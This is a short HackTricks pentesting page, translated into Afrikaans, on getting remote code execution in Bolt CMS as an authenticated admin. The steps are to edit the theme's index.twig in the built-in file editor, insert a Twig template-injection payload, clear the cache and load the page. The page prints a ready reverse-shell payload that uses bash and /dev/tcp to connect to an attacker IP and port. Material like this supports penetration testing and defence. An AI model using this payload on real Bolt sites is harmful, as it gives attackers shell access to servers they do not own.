hacktricks/network-services-pentesting/pentesting-web/bolt-cms.md

Bolt CMS

{% hint style="success" %} Leer & oefen AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Leer & oefen GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)

Support HackTricks

• Kyk na die subskripsie planne!
• Sluit aan by die 💬 Discord groep of die telegram groep of volg ons op Twitter 🐦 @hacktricks_live.
• Deel hacking truuks deur PRs in te dien na die HackTricks en HackTricks Cloud github repos.

{% endhint %}

RCE

Na aanmelding as admin (gaan na /bot om die aanmeldprompt te bereik), kan jy RCE in Bolt CMS verkry:

• Kies Configuration -> View Configuration -> Main Configuration of gaan na die URL pad /bolt/file-edit/config?file=/bolt/config.yaml
• Kontroleer die waarde van tema

• Kies File management -> View & edit templates
• Kies die tema basis wat in die vorige (base-2021 in hierdie geval) stap gevind is en kies index.twig
• In my geval is dit in die URL pad /bolt/file-edit/themes?file=/base-2021/index.twig
• Stel jou payload in hierdie lêer via template injection (Twig), soos: {{['bash -c "bash -i >& /dev/tcp/10.10.14.14/4444 0>&1"']|filter('system')}}
• En stoor veranderinge

• Maak die cache skoon in Maintenance -> Clear the cache
• Toegang weer die bladsy as 'n gewone gebruiker, en die payload behoort uitgevoer te word

{% hint style="success" %} Leer & oefen AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Leer & oefen GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)

Support HackTricks

• Kyk na die subskripsie planne!
• Sluit aan by die 💬 Discord groep of die telegram groep of volg ons op Twitter 🐦 @hacktricks_live.
• Deel hacking truuks deur PRs in te dien na die HackTricks en HackTricks Cloud github repos.

{% endhint %}